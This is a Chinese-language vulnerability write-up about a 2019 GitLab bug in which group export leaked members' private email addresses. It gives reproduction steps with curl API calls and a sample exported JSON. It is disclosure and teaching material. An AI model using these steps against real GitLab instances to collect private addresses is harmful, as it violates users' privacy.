gitlab漏洞系列-私有邮箱泄露

声明：文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。

背景

xanbanx于2019年12月份提交了这个漏洞: GitLab新了增导出组的功能。维护者(Maintainers)可以执行此操作并以存档的形式下载导出的组。此外,GitLab用户可以将他们的电子邮件设置为私有，这样这些电子邮件地址就不会泄露给其他用户。但是，新的组导出(group export)不遵守此设置。用户私人邮件通过群组导出功能泄露。因此，恶意用户可以滥用这一功能，将用户添加到组中，然后获取他们的私人电子邮件地址。

复现步骤

1.创建一个新组

2.添加一些用户，他们的电子邮件地址设置为私人的;

3.通过以下命令来实现导出组功能:

 curl -X POST --header "PRIVATE-TOKEN: Token" https://example.gitlab.com/api/v4/groups/<id>/export

4.通过以下命令实现下载导出组功能:

curl --header "PRIVATE-TOKEN: Token" https://example.gitlab.com/api/v4/groups/<id>/export/download -o group.tar.gz

5.提取归档文件并检查包含group.json的文件。在这里你会发现像一个下面的一个成员部分，泄漏所有成员的私人电子邮件地址。

...  
"members": [  
    {  
        "id": 1,  
        "access_level": 10,  
        "source_id": 2,  
        "source_type": "Namespace",  
        "user_id": 23,  
        "notification_level": 3,  
        "created_at": "2019-12-27 17:45:04 UTC",  
        "updated_at": "2019-12-27 17:45:04 UTC",  
        "created_by_id": 1,  
        "invite_email": null,  
        "invite_token": null,  
        "invite_accepted_at": null,  
        "requested_at": null,  
        "expires_at": null,  
        "ldap": false,  
        "override": false,  
        "user": {  
            "id": 23,  
            "email": "[email protected]",  
            "username": "foo"  
        }  
    },  
    ...  
]